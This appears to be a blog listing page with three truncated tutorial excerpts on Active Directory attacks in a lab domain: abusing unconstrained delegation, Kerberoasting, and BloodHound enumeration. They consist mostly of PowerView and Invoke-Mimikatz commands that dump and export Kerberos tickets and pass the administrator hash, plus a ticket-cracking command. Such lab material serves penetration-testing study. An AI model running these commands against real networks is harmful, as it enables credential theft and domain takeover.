Powershell * POWERSHELL SECURITY

Privesc kerberos

Discover domain computers which have unconstrained delegation enabled using powerview : PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer –Unconstrained Using active directory module : PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer –Unconstrained PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADUser -Filter {trustedfordelegation -eq $true} Run the following command on it to check if anyDA token is available: PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command ‘”sekurlsa::tickets”‘ PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command ‘”sekurlsa::pth /user:administrator…

Powershell * POWERSHELL SECURITY

Domain Privesc

Find user accounts used as service accounts : PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Import-Module .\ActiveDirectory.psd1 PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Get-ADUser -filter {serviceprincipalname -ne “$null”} -Properties serviceprincipalname Check if the TGS has been granted : PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> klist Export all ticket using mimitakz : PS C:\Users\victim.SECURITY\Downloads\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”kerberos::list /export”‘ https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py PS C:\Users\victim.SECURITY\Downloads\kerberoast-master\kerberoast-master> python.exe .\tgsrepcrack.py .\10k-worst-passwords.txt .\2-40a50000-victim@ldap~WIN-2RUMVG5JPOC.security.local~security.local-SECURITY.LOCAL.kirbi…

Powershell * POWERSHELL SECURITY

Domain Enumeration: Bloodhound

https://github.com/BloodHoundAD/BloodHound Supply data to bloodhound : PS C:\Users\victim.SECURITY\Downloads\BloodHound-master\BloodHound-master\Ingestors> Import-Module .\SharpHound.ps1 PS C:\Users\victim.SECURITY\Downloads\BloodHound-master\BloodHound-master\Ingestors> Invoke-BloodHound -CollectionMethod all –Verbose Now download the file https://neo4j.com/download-center/#community extract the file  and go to bin folder PS C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9> cd .\bin\ PS C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9\bin> dir Now on terminal C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9\bin>neo4j.bat install-service C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9\bin>neo4j.bat start Now download https://github.com/BloodHoundAD/BloodHound/releases BloodHound-win32-x64.zip file After extraction double click on BloodHound.exe file….